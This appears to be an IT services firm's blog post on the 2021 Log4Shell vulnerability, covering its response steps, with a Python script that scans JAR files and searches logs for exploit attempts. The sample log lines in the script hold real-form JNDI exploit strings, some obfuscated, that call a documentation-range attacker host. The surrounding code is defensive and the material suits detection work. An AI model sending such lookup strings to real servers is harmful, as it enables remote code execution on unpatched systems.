How did your IT firm react to Log4j?
Preparation is often half the battle. That holds true for many things, but it holds especially true in cybersecurity. On Friday, December 10, 2021, news broke of active exploitation of a critical vulnerability (CVE-2021-44228, since nicknamed Log4Shell) in Log4j, a logging component used by a great deal of Java-based software.
Labeled by some the most serious vulnerability ever, the problem, put simply, is a flaw in one of the internet's most commonly used pieces of code. For years, Log4j has been the library that Java applications use to log, or keep track of, application activity. It is an Apache project rather than part of the Java language itself, but it has shipped inside software all over the internet for as long as Java has been a foundational language, which is to say since the 90s. So, if the internet has been using Log4j for so long, why is this considered potentially the biggest security hole of the past decade?
In early December it was discovered that Log4j 2 could be used by bad actors to seize control of application servers simply by getting the application to log a specially crafted string. Log4j interprets certain patterns in logged text (a feature called lookups), and one of them, the JNDI lookup, can be pointed at an attacker-controlled server that hands back code for the application to load and run. Because almost anything a user sends (a username, a User-Agent header, a chat message) may end up in a log, a single line of bad input could give anyone the keys to an organization. Flaws of this reach are rare.
Log4j Vulnerability Tests Agility of Internal & Outsourced IT
With a vulnerability of this severity exposed, organizations of every size have rushed to review their environments and remediate where they can. An event like this lays bare which organizations know their environments intimately and practice active management, whether through a third-party provider or in-house IT.
Here are some steps that we took to keep our clients safe in response to the Log4j vulnerability:
Enumeration, Mitigation, and Attack Detection
Working with our partners, we leveraged a third-party external tool for both Windows and Linux that downloads and executes the latest detection methods published by Florian Roth.
The tool, championed by Datto, allowed us to:
- Scan all JAR files on the system for signs of insecure versions of Log4j
- Search TXT and LOG files on a system for indicators of a potential attack (the ${jndi: lookup strings and their obfuscated variants)
- Automatically inoculate against future exploit attempts by setting the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true. Note that this setting only affects Log4j 2.10 through 2.14.1, and Apache later found it insufficient in some configurations (see CVE-2021-45046); upgrading Log4j, or removing the JndiLookup class from log4j-core, is the lasting fix.
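To make the first two checks concrete, here is a small offline triage script. It is an added example, not the Datto/Florian Roth tool the steps above describe: it flags log4j-core archives (including ones nested inside WARs and fat JARs) that still contain the JndiLookup class and predate 2.16.0, and it searches log lines for ${jndi: lookups after collapsing the common obfuscations (${lower:j}, ${::-j}, URL encoding). The log lines, archive contents and IP addresses are constructed for the example.

```python
# Added example (not the Datto/Florian Roth tool the post describes): a small
# offline triage helper showing the two checks that tool performs, vulnerable
# JAR enumeration and log indicator search. All sample data is constructed.
import io
import re
import zipfile
from urllib.parse import unquote

# Log4j 2 builds below 2.16.0 still resolve lookups inside log messages.
# 2.15.0 fixed CVE-2021-44228 but left CVE-2021-45046 open in some
# configurations, so it is flagged too. Log4j 1.x is a separate code base
# and is not handled here.
FIXED_VERSION = (2, 16, 0)
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(pom_properties):
    """Turn 'version=2.14.1' into (2, 14, 1); None if no version line exists."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None


def scan_jar_bytes(data, name="<memory>"):
    """Return [(archive name, version)] for every vulnerable log4j-core in a
    JAR, descending into nested JARs (fat JARs and WARs bundle it under lib/)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings          # not a real archive: nothing to inspect
    with zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP_CLASS in names:
            version = None
            if POM_PROPERTIES in names:
                version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
            # JndiLookup present with an unknown version is treated as
            # vulnerable: the safe assumption during incident response.
            if version is None or version < FIXED_VERSION:
                findings.append((name, version))
        for entry in sorted(names):
            if entry.lower().endswith((".jar", ".war", ".ear")):
                findings.extend(scan_jar_bytes(zf.read(entry), f"{name}!{entry}"))
    return findings


def scan_jar_file(path):
    with open(path, "rb") as fh:
        return scan_jar_bytes(fh.read(), path)


# Attackers hide the string "jndi" inside nested lookups such as ${lower:j},
# ${upper:N} or ${::-j}. Collapse those to the text they resolve to, innermost
# first, then look for the tell-tale ${jndi: prefix.
_INNER_LOOKUP = re.compile(r"\$\{(?:[^${}]*:-|lower:|upper:)([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line):
    line = unquote(line)         # %24%7Bjndi%3A... -> ${jndi:...
    while True:
        collapsed = _INNER_LOOKUP.sub(r"\1", line)
        if collapsed == line:
            return line
        line = collapsed


def find_exploit_attempts(lines):
    """Return (line number, normalized line) for each line carrying a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, 1):
        line = normalize(raw)
        if _JNDI.search(line):
            hits.append((number, line))
    return hits


# Constructed access-log sample using RFC 5737 documentation addresses.
SAMPLE_ACCESS_LOG = [
    '198.51.100.23 - - [10/Dec/2021:19:41:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '203.0.113.9 - - [10/Dec/2021:19:41:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:19:42:03 +0000] "GET /login HTTP/1.1" 404 153 "-" "${${lower:j}${upper:n}di:rmi://203.0.113.9:1099/x}"',
    '203.0.113.9 - - [10/Dec/2021:19:42:51 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fb%7D HTTP/1.1" 200 612 "-" "curl/7.79.1"',
]


def build_sample_jar(version=None, with_jndi_lookup=True, nested=None):
    """Constructed fixture: an in-memory archive shaped like log4j-core
    (no real bytecode), optionally embedding another archive like a WAR does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
        if version:
            zf.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\nversion={version}\n")
        if nested:
            zf.writestr("WEB-INF/lib/log4j-core.jar", nested)
    return buf.getvalue()


if __name__ == "__main__":
    war = build_sample_jar(None, with_jndi_lookup=False, nested=build_sample_jar("2.14.1"))
    print(scan_jar_bytes(war, "app.war"))
    for number, line in find_exploit_attempts(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {line}")
```

Two design points worth noting. The JAR check keys on the presence of JndiLookup.class rather than on the version alone, so an archive that was "patched" by deleting that class (Apache's recommended stopgap) is correctly reported clean, while an archive with no version information is still reported, because guessing in the safe direction is the right call during an incident. The log check normalizes before matching; a naive search for the literal text "${jndi:" misses the obfuscated second and third attempts in the sample.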
Sophisticated Scanning & Custom Scripts
Our team also deployed broader scanning, using custom scripts to scan, log, and identify areas for review. We correlated the information gathered by our security team with ongoing releases from software vendors and with our environment risk documentation to rapidly identify the software and systems in immediate need of patching. From there our team generated a risk heat map, allowing us to address systems from greatest to least risk in a measured approach as we deployed patching.
Blocking External Communication
We also created strict firewall and web filtering rules to monitor for and block the outbound connections a Log4j exploit depends on: the LDAP, RMI, and other unexpected egress from application servers to the internet that a successful lookup triggers, and any follow-on communication with command-and-control (C2) infrastructure.
We recommend the following actions in addition to the immediate actions we performed above:
- If you use an IT or cybersecurity provider (an internal SOC, a Managed Security Service Provider [MSSP], a Managed Services Provider [MSP], etc.), ensure they are aware of, monitoring, and acting on any alerts associated with the presence of Log4j in your environment
- Ask them specifically for evidence that they are watching for outbound traffic resulting from a Log4j exploitation attempt (for example LDAP, RMI, or unexpected DNS requests leaving an application server), not just for inbound scanning
- Install a Web Application Firewall (WAF), or update an existing one, with rules that refresh automatically with the latest signatures; treat this as a stopgap, since obfuscated payloads have bypassed WAF rules, and patching remains the real fix
- CISA will be maintaining a repository of information and affected software here
- Another useful and trusted repository is being maintained by the Dutch National Cyber Security Center
- DHS CISA Apache Log4j Vulnerability Guidance
- DHS CISA Github Repository
- National Vulnerability Database: CVE-2021-44228
- Apache Log4j Security Update Page
- Microsoft Blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation
- Cisco Talos Intelligence Group - Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
- Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations
- Dutch National Cyber Security Center Github Repository
- Swiss Government CERT Blog on Log4j (Good visual)
- CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations
- TrustedSec: Log4j Detection and Response Playbook
- F5 Labs: Explaining the Widespread Log4j Vulnerability
- Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
- Curated Intelligence Trust Group Github Repository
- SwitHak Blue Team Cheat Sheet for Log4j
- Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild
- Tech Solvency: The Story So Far
- TryHackMe: Solar, exploiting log4j
- Picus Security: Simulating and Preventing CVE-2021-44228 Apache Log4j RCE Exploits
- National Vulnerability Database: CVE-2021-45046
- Carnegie Mellon University CERT Coordination Center
- RecordedFuture: Log4Shell Attacks Expand to State Actors